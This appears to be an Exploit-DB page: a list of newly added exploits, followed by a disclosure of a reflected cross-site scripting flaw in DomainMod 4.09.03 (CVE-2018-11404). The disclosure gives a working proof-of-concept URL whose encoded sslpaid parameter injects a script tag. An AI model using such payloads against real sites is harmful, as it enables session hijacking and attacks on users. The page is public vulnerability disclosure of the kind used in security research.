
11 changes to exploits/shellcodes ALFTP 5.31 - Local Buffer Overflow (SEH Bypass) CloudMe Sync < 1.11.0 - Buffer Overflow (SEH) (DEP Bypass) Wordpress Plugin Events Calendar - SQL Injection / Cross-Site Scripting Wordpress Plugin Booking Calendar 3.0.0 - SQL Injection / Cross-Site Scripting TP-Link TL-WR840N/TL-WR841N - Authenticaton Bypass DomainMod 4.09.03 - 'oid' Cross-Site Scripting DomainMod 4.09.03 - 'sslpaid' Cross-Site Scripting Wordpress Plugin Events Calendar - SQL Injection Joomla! Component Full Social 1.1.0 - 'search_query' SQL Injection Joomla! Component jCart for OpenCart 2.3.0.2 - Cross-Site Request Forgery Joomla! Component JoomOCShop 1.0 - Cross-Site Request Forgery wityCMS 0.6.1 - Cross-Site Scripting Linux/x86 - Bind (5555/TCP) Shell Shellcode (98 bytes)
11 lines
No EOL
647 B
Text
11 lines
No EOL
647 B
Text
# Exploit Title: DomainMod v4.09.03 has XSS via the assets/edit/ssl-provider-account.php sslpaid parameter
|
||
# Date: 2018-05-28
|
||
# Exploit Author: longer(76439392@qq.com)
|
||
# Vendor Homepage: domainmod (https://github.com/domainmod/domainmod)
|
||
# Software Link: domainmod (https://github.com/domainmod/domainmod)
|
||
# Version: v4.09.03
|
||
# CVE : CVE-2018-11404
|
||
|
||
An issue was discovered in DomainMod v4.09.03.(https://github.com/domainmod/domainmod/issues/63)
|
||
After the user logged in, open the url:
|
||
http://127.0.0.1/assets/edit/ssl-provider-account.php?del=1&sslpaid=%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28931289%29%3C/ScRiPt%3E |